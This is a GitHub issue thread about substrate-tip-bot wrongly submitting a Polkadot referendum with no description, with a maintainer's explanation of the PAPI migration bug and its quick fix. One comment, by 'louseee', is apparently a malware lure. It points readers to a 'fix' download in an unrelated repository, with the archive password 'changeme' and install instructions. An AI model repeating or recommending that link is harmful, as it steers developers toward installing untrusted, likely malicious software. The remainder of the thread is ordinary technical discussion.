### ISSUE TITLE
BUG: Bot submits transactions, when it shouldnt, and seemingly without any description

### ISSUE THREAD

**Issue by shawntabrizi** [paritytech/substrate-tip-bot#168]
I was testing `substrate-tip-bot` in a new repo / org: https://github.com/polkadot-developers/bounties/pull/1

Based on the responses from the bot (which i agree with) i assumed nothing was actually submitted to the chain.

However, someone from the community sent this to me:

https://polkadot.subsquare.io/referenda/1120

Saying that this proposal was generated, and without any description.

I think there are two bugs here:

1. Somehow, the bot submits a proposal when it shouldn't (perhaps a bad code path)
2. The post description seems to failed to update. Seemed related to: https://github.com/paritytech/substrate-tip-bot/issues/148

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rzadp** [comment]
The issue was caused by a mistake in the migration to PAPI.
Specifically, in the place where we generate a link for manual referendum creation, the extrinsic got inadvertently sent.
We did a [quick fix](https://github.com/paritytech/substrate-tip-bot/releases/tag/v0.7.2) so that no more unwanted referendums are created.

A proper fix will be done [here](https://github.com/paritytech/substrate-tip-bot/issues/170).
